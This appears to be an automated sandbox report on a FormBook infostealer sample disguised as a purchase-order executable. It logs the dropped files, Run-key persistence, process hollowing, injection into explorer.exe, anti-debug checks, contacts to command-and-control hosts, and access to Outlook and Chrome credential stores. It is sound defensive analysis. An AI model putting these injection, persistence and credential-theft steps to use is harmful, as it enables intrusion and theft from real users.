Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 444
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Process created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Process created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

File created: C:\Users\user\AppData\Roaming\fqkyib

Jump to behavior

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

File created: C:\Users\user\AppData\Local\Temp\nsqB9A2.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/14@19/15

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5040
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6040

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --headless
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --unix
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --width
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --height
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --signal
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --server
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --headless
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --unix
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --width
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --height
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --signal
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Command line argument: --server

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source:	Binary string: wntdll.pdbUGP source: jaxdij.exe, 00000001.00000003.304952099.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000001.00000003.305442147.0000000002D20000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418718390.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.308889857.0000000000F6D000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.310322417.0000000001101000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.419932774.00000000013BF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.822319610.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.418994755.000000000452C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.416346932.000000000438A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.823052893.00000000047DF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: jaxdij.exe, 00000001.00000003.304952099.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000001.00000003.305442147.0000000002D20000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418718390.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.308889857.0000000000F6D000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.310322417.0000000001101000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.419932774.00000000013BF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.822319610.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.418994755.000000000452C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.416346932.000000000438A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.823052893.00000000047DF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: jaxdij.exe, 00000002.00000002.417087880.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418036056.0000000001280000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: jaxdij.exe, 00000002.00000002.417087880.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418036056.0000000001280000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_00255A55 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00255A55 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040A0C8 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041A0F0 push ebp; iretd
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040A0A5 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040A0B2 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004210BC push eax; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00421173 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00421109 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00421112 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DA4D push cs; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040EA5A pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00405220 push ebx; retf
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041AA80 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041837D push esp; retf
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00404D69 push ebx; iretd
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00419DDD pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00409E35 push 265C611Bh; retf
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00419E34 push 91A2CCF8h; ret
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041AF2C push esi; retf

Source: jaxdij.exe.0.dr	Static PE information: section name: .00cfg
Source: jaxdij.exe.0.dr	Static PE information: section name: .voltbl
Source: rubthqnwyfue.exe.1.dr	Static PE information: section name: .00cfg
Source: rubthqnwyfue.exe.1.dr	Static PE information: section name: .voltbl

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	File created: C:\Users\user\AppData\Local\Temp\jaxdij.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	File created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aekkvxebyca			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aekkvxebyca			Jump to behavior

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Windows\explorer.exe TID: 4720	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4720	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	API coverage: 2.0 %
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	API coverage: 2.6 %

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Code function: 0_2_00402654 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_002552D3 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_00255387 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_002552D3 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00255387 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

API call chain: ExitProcess graph end node

Source: explorer.exe, 00000003.00000000.376337336.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.327757416.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000003.00000000.327757416.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.393885342.00000000043B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.327757416.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.376337336.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 1_2_0025381A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 1_2_002525CB GetProcessHeap,

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_002500DE mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_002541CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_002500DE mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_002541CD mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 2_2_0040C307 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_0024D760 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_0025381A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_0024DC6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_0024D76C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0025381A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0024DC6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0024D760 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0024D76C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.publickit.website
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.65 80
Source: C:\Windows\explorer.exe	Domain query: www.dailyheraldresearch.com
Source: C:\Windows\explorer.exe	Domain query: www.ybkos.link
Source: C:\Windows\explorer.exe	Domain query: www.tommy57.shop
Source: C:\Windows\explorer.exe	Network Connect: 38.40.166.195 80
Source: C:\Windows\explorer.exe	Network Connect: 62.233.121.61 80
Source: C:\Windows\explorer.exe	Domain query: www.oonrreward.xyz
Source: C:\Windows\explorer.exe	Domain query: www.frwqc.com
Source: C:\Windows\explorer.exe	Network Connect: 178.208.83.20 80
Source: C:\Windows\explorer.exe	Network Connect: 172.67.214.243 80
Source: C:\Windows\explorer.exe	Network Connect: 198.54.121.81 80
Source: C:\Windows\explorer.exe	Domain query: www.lee-perez.com
Source: C:\Windows\explorer.exe	Network Connect: 206.83.40.92 80
Source: C:\Windows\explorer.exe	Network Connect: 107.148.15.81 80
Source: C:\Windows\explorer.exe	Domain query: www.davidemarone.com
Source: C:\Windows\explorer.exe	Domain query: www.porggiret.site
Source: C:\Windows\explorer.exe	Network Connect: 93.179.127.27 80
Source: C:\Windows\explorer.exe	Network Connect: 23.111.12.177 80
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.214 80
Source: C:\Windows\explorer.exe	Domain query: www.bookmygennie.com
Source: C:\Windows\explorer.exe	Domain query: www.gmrsnodes.com
Source: C:\Windows\explorer.exe	Domain query: www.new-thinking.digital
Source: C:\Windows\explorer.exe	Network Connect: 192.185.90.105 80
Source: C:\Windows\explorer.exe	Domain query: www.tobewell.store
Source: C:\Windows\explorer.exe	Domain query: www.700544.com
Source: C:\Windows\explorer.exe	Domain query: www.amspustaka.com
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 80
Source: C:\Windows\explorer.exe	Network Connect: 38.163.214.169 80
Source: C:\Windows\explorer.exe	Domain query: www.spirituallyzen.com
Source: C:\Windows\explorer.exe	Network Connect: 216.40.34.41 80

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 380000

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\jaxdij.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Thread register set: target process: 3324
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3324

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Process created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k

Source: explorer.exe, 00000003.00000000.367643427.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.376579579.00000000086B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.391418068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.362128973.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.391418068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.362128973.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.391418068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.362128973.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.313336465.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.390965323.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.361602747.0000000000878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanLoc*U

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 1_2_0024D985 cpuid

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 1_2_0024D612 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
